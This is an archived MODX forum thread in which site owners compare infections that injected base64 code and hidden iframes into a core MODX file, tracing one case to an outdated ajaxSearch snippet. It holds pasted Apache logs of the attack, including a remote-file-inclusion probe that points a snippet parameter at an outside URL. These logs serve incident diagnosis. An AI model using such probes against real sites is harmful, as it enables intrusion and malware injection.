We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
  • Quote from: banzai at Aug 04, 2010, 01:48 PM

    SMF 1.1.1

    If that’s version 1.1.1 and not version 1.1.10 or 1.1.11 then you have a really exploitable version of SMF installed. We in fact got bit by this ourselves last year. Everything you’ve experienced can be done by exploiting that security hole. You’d need to find out more details on the SMF site.
      Ryan Thrash, MODX Co-Founder
      Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
      • 18913
      • 654 Posts
      SMF is not installed on the set up I saw...
      Matt
        • 30879
        • 40 Posts
        yep no SMF for me either, actually no other software installed
          • 2762
          • 1,198 Posts
          Quote from: rthrash at Aug 05, 2010, 04:16 PM

          Quote from: banzai at Aug 04, 2010, 01:48 PM

          SMF 1.1.1

          If that’s version 1.1.1 and not version 1.1.10 or 1.1.11 then you have a really exploitable version of SMF installed. We in fact got bit by this ourselves last year. Everything you’ve experienced can be done by exploiting that security hole. You’d need to find out more details on the SMF site.

          Sorry for mistaken Ryan, it’s SMF 1.1.11 wink
            Free MODx Graphic resources and Templates www.tattoocms.it
            -----------------------------------------------------

            MODx IT  www.modx.it
            -----------------------------------------------------

            bubuna.com - Web & Multimedia Design
            • 14300
            • 1 Posts
            We now have an infected MODx site as well - with the same file and the same injection string. Like a couple of you, we aren’t seeing that this came through w/FTP and don’t have any other software running. I’m wondering if there’s not a newly identified exploit that affects MODx. We haven’t fully scanned web log files yet. If anyone has any progress in identifying the source of this attack, please post reply to this thread.

            Our eval string was at the end of document.parser.class.inc.php

            Incidentally, the site is hosted at Rackspace’s Cloud Sites (aka Mosso) but RS is saying they aren’t responsible for it so we’re looking for any other possibilities. However, if any of you who are also experiencing the issue and hosted through RS Cloud, it might indicate a pattern. Here is a similar exploit I read about on GoDaddy Wordpress sites:
            http://www.whitefirdesign.com/resources/bibzoplcom-malware.html
              • 21246
              • 55 Posts
              FYI:

              Got hit by the same hack on MT grid on July 18th. MT said it was not them but around the same time they had that massive WP attack which also affected RS. No T/S change on the file. I am the only admin on a clean machine. Only used SFTP for access. No other users in MODX.

              Version 1.04

              I checked the DB tables/rows all good. Source was clean so the update (hack) to the manager/includes/document.parser.class.inc.php file occurred on the grid.

              I downloaded the site and compared it to my git clone, that was the only mod.

              I moved most of all my sites off the grid to dedicated servers fully under my thumb. Things have been clean since.

              I can’t prove it was them since I have no logs on the grid but to many coincidences with all the WP and other CMS’s hacked around that time.

                • 18913
                • 654 Posts
                The example I saw occurred on Bluehost.

                @jmarlin : did you see the help_y.php file and if so, were you able to uncompress and view the php?

                MattC
                  • 18913
                  • 654 Posts
                  Another thought : the example I saw had been installed with SimpleScripts, rather than manually. Have any of the other affected sites been similarly installed? Put differently, were any of the other sites manually installed?
                  MattC
                    • 7906
                    • 10 Posts
                    I also had a site that was infected a few weeks ago (i.e. the document.parser.class.inc.php file was infected with the same base64 code and injecting a hidden iframe into pages).

                    I was able to trace the vulnerability to what I believe was an old version ajaxSearch, 1.8.1 (I have since found that the Modx team has warned that the older versions of this snippet are vulnerable).

                    I am pretty sure the attacker gained entry via the ajaxsearch snippet based on the log entries below.

                    I included the first three entries (at 1:21:55) because this might have been the probe that sent the notice back to the server that performed the attack (notice the request for the ajaxSearch_readme.txt file .. which may be used to determine the current version). The attack came about 20 minutes later. Notice the GET with the base64_js parameter. Also, I found that the ajaxSearch directory had a timestamp of 1:44 .. the exact time of these requests. (This was the only timestamp on the site that was different than the timestamp of the last set of uploads). It is likely that I am way off base here, but since removing ajaxSearch, and restoring the document parser I have not had any problems. Google has reviewed the site and removed the warning as well.

                    Also, the same as with everyone else, the document parser timestamp had not changed. I have since removed ajaxSearch from the site until I upgrade the to the latest version of Modx. (currently running 0.9.6.3, ajaxSearch 1.8.1). Mostly, I need to take the blame for this by not keeping current with the Modx security issues that have been clearly posted.

                    FYI, I am now seeing some suspicious requests to the reflect snippet. (see 2nd log entry) It appears an attacker my be attempting an exploit of some nature. If anyone has any insight into this and whether or not I should be worried, please let me know.

                    Hopefully this might help any others on one of the older versions of Modx and more specifically ajaxSearch.

                    Doug

                    heloop.netplan.co.uk - - [14/Jul/2010:01:21:52 -0400] "GET /assets/snippets/ajaxSearch/ajaxSearch_readme.txt HTTP/1.1" 200 24841 "-" "-"
                    theloop.netplan.co.uk - - [14/Jul/2010:01:21:55 -0400] "GET /assets/snippets/ajaxSearch/ajax_g.php HTTP/1.1" 200 21244 "-" "-"
                    theloop.netplan.co.uk - - [14/Jul/2010:01:21:55 -0400] "GET /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 28546 "-" "-"
                    212.62.110.20 - - [14/Jul/2010:01:43:55 -0400] "GET /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 28976 "http://nubar.co.uk/thumbs/thumb/modxall/google_links.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    212.62.110.20 - - [14/Jul/2010:01:44:07 -0400] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js HTTP/1.1" 200 2172 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    212.62.110.20 - - [14/Jul/2010:01:43:57 -0400] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js HTTP/1.1" 200 2172 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    212.62.110.20 - - [14/Jul/2010:01:44:06 -0400] "POST /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 29302 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    212.62.110.20 - - [14/Jul/2010:01:44:33 -0400] "POST /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 28751 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    212.62.110.20 - - [14/Jul/2010:01:44:34 -0400] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js HTTP/1.1" 404 6382 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    


                    ea.f8.7bae.static.theplanet.com - - [08/Aug/2010:06:12:46 -0400] "GET /about//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.yptmtc.org/BU/bu/id? HTTP/1.1" 404 6206 "-" "libwww-perl/5.805"
                    
                    
                      • 30879
                      • 40 Posts
                      id really like to know this aswell. Scary!

                      Id like to see a shift to some type of easy updatability, where old files of plugin upgrades can be removed etc.

                      I know that if you go digging you can find all types of tips for securing modx but u really have to dig for it